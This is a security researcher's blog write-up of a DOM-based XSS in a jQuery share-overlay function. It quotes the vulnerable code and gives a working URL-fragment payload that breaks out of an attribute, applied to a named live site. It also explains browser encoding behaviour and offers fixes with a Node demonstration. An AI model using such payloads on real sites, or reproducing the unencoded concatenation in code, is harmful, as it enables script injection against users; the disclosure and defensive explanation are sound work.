Exploiting DOM Based Cross-site Scripting (XSS) [location.href]

I recently found an exploitable DOM-based XSS vulnerability caused by a vulnerable JavaScript dependency (jQuery).

Okay, let's look at an example of the vulnerable code.

// Vulnerable as found: the current page URL (window.location.href) is concatenated
// straight into an HTML string, inside a single-quoted value='...' attribute,
// and the whole string is handed to jQuery's .append(), which parses it as HTML.
// The url parameter is never used; the function reads window.location.href instead.
function sfsi_mobile_jake_share(url) {
    if (jQuery('.sfsi_jake_follow_overlay')
        .length == 0) {
        jQuery('body')
            .append("<div class='sfsi_jake_follow_overlay sfsi_overlay show'><div class='sfsi_inner_display'><a class='close_btn' href='' onclick=\"event.preventDefault();close_overlay(\'.sfsi_jake_follow_overlay\')\" >×</a><div style='width:95%; min-height:80%;background-color:#fff;margin:0 auto;margin:30% auto;padding: 20px 0;'><div style='width:90%;margin: 0 auto;'><input type='text' value='" + window.location.href + "' style='width:100%;padding:7px 0;text-align:center' /></div><div style='width:80%;margin:10px auto 0 auto'><div class='sfsi_upload_butt_container' ><button onclick='sfsi_copy_text_parent_input(event)' class='upload_butt' >Copy</button></div><div class='sfsi_upload_butt_container' ><a href='weixin://' class='upload_butt'>Open This Element</a></div></div></div></div>");
    }
}


As you can see, the value of window.location.href is concatenated into the HTML string without any encoding. Because it lands inside the single-quoted value='...' attribute of the <input>, a URL whose fragment contains a single quote followed by a closing angle bracket terminates the attribute and the tag, and everything after it is parsed by the browser as new markup. window.location.href is attacker-influenced (the fragment never reaches the server), so this is a DOM-based XSS sink.

Let's exploit it!
First, visit a website that uses the vulnerable JavaScript dependency shown above.
Example: http://cyberscap.com/

Then append the following to the URL as a fragment: #'><img src=x onerror=alert(document.domain)>

The final URL should look like this: http://cyberscap.com/#'><img src=x onerror=alert(document.domain)>

The single quote closes the value attribute, the > closes the <input> tag, and the <img> element that follows fires its onerror handler as soon as jQuery appends the markup.

In Chrome, however, this payload no longer works: Chrome percent-encodes characters such as < and > in the fragment before exposing it through location.href, so the injected tag never reaches the HTML parser. It is still exploitable in Edge and other browsers that hand the fragment back unencoded. Note that the browser encoding is not a fix: the single quote is not encoded, so the attribute is still terminated early, and the application is the one that must stop concatenating location.href into markup (for example by setting the input's value through the DOM with jQuery's .val(), or by HTML-encoding the value before inserting it).
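The following is an added example, not the plugin's code, that reproduces the attribute breakout outside a browser so it can be run under Node. The two href helpers are an assumption standing in for what window.location.href returns: rawHref() models a browser that hands the fragment back untouched (what the post observed in Edge), and specEncodedHref() applies the WHATWG URL fragment percent-encode set that Chrome applies. The <input> is reduced to the part of the plugin's markup that matters, and the hardened builder shows the HTML-attribute encoding that closes the hole.

```javascript
// Added example (not from the plugin). Models the sfsi_mobile_jake_share()
// concatenation and its fix, runnable under Node without a DOM.

// Fragment percent-encode set from the WHATWG URL Standard: C0 controls,
// DEL, space, double quote, < > and backtick (non-ASCII omitted here for
// brevity). Chrome applies this before exposing the fragment in
// location.href. Note that the single quote is NOT in the set.
const FRAGMENT_ENCODE = /[\u0000-\u001f\u007f "<>`]/g;

function percentEncode(c) {
  return '%' + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0');
}

// Assumption: what a spec-following browser (e.g. Chrome) returns for location.href.
function specEncodedHref(url) {
  const i = url.indexOf('#');
  if (i < 0) return url;
  return url.slice(0, i + 1) + url.slice(i + 1).replace(FRAGMENT_ENCODE, percentEncode);
}

// Assumption: what the post observed in Edge, the fragment comes back untouched.
function rawHref(url) {
  return url;
}

// Vulnerable sink: the plugin's pattern, href concatenated into a
// single-quoted attribute with no encoding.
function buildShareInputVulnerable(href) {
  return "<input type='text' value='" + href + "' style='width:100%' />";
}

// Hardened sink: encode the five HTML-significant characters first, so the
// value can neither terminate the attribute nor open a new tag. (In a real
// page the cleaner fix is jQuery('input').val(location.href), which never
// goes through the HTML parser at all.)
function escapeHtmlAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}
function buildShareInputFixed(href) {
  return "<input type='text' value='" + escapeHtmlAttr(href) + "' style='width:100%' />";
}

// Crude parser stand-ins: how many tags does the markup contain, and what
// does the value attribute hold once the parser hits the first single quote?
function countTags(html) {
  return (html.match(/<[a-z][^>]*>/gi) || []).length;
}
function valueAttr(html) {
  const m = html.match(/value='([^']*)'/);
  return m ? m[1] : null;
}

// Constructed test URL carrying the post's payload in the fragment.
const PAYLOAD_URL = "http://cyberscap.com/#'><img src=x onerror=alert(document.domain)>";

function demo() {
  return {
    // Unencoded fragment: <input> plus the injected <img> -> 2 tags.
    edgeTags: countTags(buildShareInputVulnerable(rawHref(PAYLOAD_URL))),
    // Chrome-style encoding: < and > arrive as %3C %3E -> only the <input>.
    chromeTags: countTags(buildShareInputVulnerable(specEncodedHref(PAYLOAD_URL))),
    // ...but the attribute is still cut short at the unencoded single quote.
    chromeValue: valueAttr(buildShareInputVulnerable(specEncodedHref(PAYLOAD_URL))),
    // Hardened builder: one tag even with the raw fragment, value kept intact.
    fixedTags: countTags(buildShareInputFixed(rawHref(PAYLOAD_URL))),
    fixedValue: valueAttr(buildShareInputFixed(rawHref(PAYLOAD_URL))),
  };
}

console.log(demo());
```

The chromeValue result is the practical caveat: browser-side fragment encoding stops the <img> from being parsed, but the single quote still escapes the attribute, so the page remains fragile and only the application-side encoding (or a DOM property assignment) removes the sink.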

Akalanka Ekanayake
https://akalanka.uk
Security Researcher & Explorer
